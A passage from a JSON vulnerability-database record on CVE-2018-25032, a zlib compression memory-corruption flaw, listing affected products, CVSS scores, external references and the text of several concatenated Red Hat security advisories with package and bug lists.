"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "15.38"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.9.2"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.3.36"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.7.0"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.10.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "scalance sc632-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "7.52"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "13.46"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.5.0"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.9.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.7.14"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.4.26"
},
{
"_id": null,
"model": "scalance sc622-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.5.17"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.8.0"
},
{
"_id": null,
"model": "scalance sc636-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.7.0"
},
{
"_id": null,
"model": "scalance sc642-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "zlib",
"scope": "lt",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.12"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "8.60"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.70.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.4"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.8.14"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.9.0"
},
{
"_id": null,
"model": "gotoassist",
"scope": "lt",
"trust": 1.0,
"vendor": "goto",
"version": "11.9.18"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.4.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "11.54"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.6"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "nokogiri",
"scope": "lt",
"trust": 1.0,
"vendor": "nokogiri",
"version": "1.13.4"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.8.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "scalance sc646-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.3.0"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "17.32"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.9.13"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 0.8
},
"cve": "CVE-2018-25032",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-25032",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-418557",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2018-25032",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-25032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-25032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2221",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-418557",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-25032",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"description": {
"_id": null,
"data": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.11 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):\n\n2057544 - Cancel rpm-ostree transaction after failed rebase\n2058674 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage \u0026 proper backoff\n2062655 - [4.8.z backport] cluster scaling new nodes ovs-configuration fails on all new nodes\n2070762 - [4.8z] WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache\n2074053 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling\n2074680 - csv_succeeded metric not present in olm-operator for all successful CSVs\n2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file\n2077004 - Bump to latest available 1.21.11 k8s\n2077370 - [4.8.z] NetworkPolicy tests are failing on metal IPv6\n2077765 - (release-4.8) Gather namespace names with overlapping UID ranges\n2078477 - Latest ose-jenkins-agent-base:v4.9.0 image fails to start on OpenShift due to FIPS error\n2084259 - [4.8] OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM\n2088196 - Redfish set boot device failed for node in OCP 4.8 latest RC\n\n5. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: zlib security update\nAdvisory ID: RHSA-2023:0943-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0943\nIssue date: 2023-02-28\nCVE Names: CVE-2018-25032 \n=====================================================================\n\n1. Summary:\n\nAn update for zlib is now available for Red Hat Enterprise Linux 7.7\nAdvanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.7 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.7) - x86_64\n\n3. Description:\n\nThe zlib packages provide a general-purpose lossless data compression\nlibrary that is used by many different programs. \n\nSecurity Fix(es):\n\n* zlib: A flaw found in zlib when compressing (not decompressing) certain\ninputs (CVE-2018-25032)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. 
Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2067945 - CVE-2018-25032 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nppc64le:\nzlib-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-devel-1.2.7-18.el7_7.1.ppc64le.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7):\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 
7.7):\n\nppc64le:\nminizip-1.2.7-18.el7_7.1.ppc64le.rpm\nminizip-devel-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-static-1.2.7-18.el7_7.1.ppc64le.rpm\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7):\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-25032\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY/3zpNzjgjWX9erEAQgopRAAnicJE4nJGD63kGm+PqFucbREdCZ3tCHM\nppSjAZYm6e3z2cXqCA8Y/ZQxQjLGFUuT3PtzsD8eehFIu7WL6hO7s+jVaor/PYxG\nh1X9YRrtAGlCrMwUXgSpTmqCeXMofoXhZRgj/0fJASp/+C6sMOBYyJkPsSCT00fu\nbIU/TEKTFa6UNjLGBZLNMD1htyYAI70mrLp+zJB4HlFP8G7bX8XMduBwyFu8l9Ye\nC4u9A4n1yUWo6eJpK1jn91y9W0VcB2JEnCQ3CySVI4Oa0hzSQBEfVnGDicELtAcv\nF6yV4AcCk30JtsXLtihnZszk5Ke0uH/VICY9ubPH52rBqLzCELWrAtEkcfGJnPFr\n/TrCfgDC9vIDE9+QPWamraX62NKy9vwOf/pPOnSOGJUYngYuVIJl/ipWwbr0BhLd\nJ3Ckbo0jlXjjXmMKnfv0LDr/0dvLNGc4VjqbEcJULNMiUu3Lh/I0/v3H7NCr8674\nRFDBaKXJlzgJGCcQ7JFr/63Aw6kOp9lVJgjbnDYs1AV/FQVkLsIvw5hIdONZI5cP\nuJcrO4lfjw/4827E7gdBTnQEBRuZB/wGtmtcFrvIPiK+qWl0t457ic+nvDl8noiM\nkBZezS7yByEjCqudJgxEYrB8uUt+gX9aj08sqeyM9jSzUCpJAVCNycufQGvmblNA\nvP1CheTiOdc=\n=wNUm\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - noarch\n\n3. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nSRVKE-1217 - New KafkaSource implementation does not default to PLAIN for SASL\n\n6. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.51. 
See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:2267\n\nSpace precludes documenting all of the container images in this advisory. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-x86_64\n\nThe image digest is\nsha256:539c1f5982343e0709179f305e347560304fdeb89a09bd042a59a58a836a0940\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-s390x\n\nThe image digest is\nsha256:f6fa9f75e6de166b6daccbc6830bbeaade38eac97faa2752e0c38af23aa4135e\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-ppc64le\n\nThe image digest is\nsha256:e4a1eb51749bdb0fa429e5b7f697d3b38cd32b76786dc1ce579a5d53827705b0\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2057526 - cloud provider config change breaks the cluster\n2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file\n2081483 - csv_succeeded metric not present in olm-operator for all successful CSVs\n2082029 - Bump to latest available 1.20.15 k8s\n\n5. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? 
button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC] Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-25032"
},
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-418557",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-25032",
"trust": 2.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/28/3",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/26/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/28/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/24/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/25/2",
"trust": 1.8
},
{
"db": "SIEMENS",
"id": "SSA-333517",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "167346",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169897",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169782",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167679",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167622",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "168352",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168042",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167327",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167391",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167400",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167956",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167088",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167142",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168696",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167008",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167602",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166946",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166563",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170003",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167555",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167224",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167568",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167260",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167461",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167591",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168011",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167189",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167281",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169624",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166970",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168392",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167486",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.1366",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3050",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4601",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3299",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1665",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1863",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2561",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3228",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2709",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2474",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2181",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3821",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3236",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6128",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5062",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3146",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2857",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2924",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1695",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1403",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3136",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3479",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3977",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2778",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4632",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3020",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2598",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2900",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022033020",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072056",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022050233",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032845",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051703",
"trust": 0.6
},
{
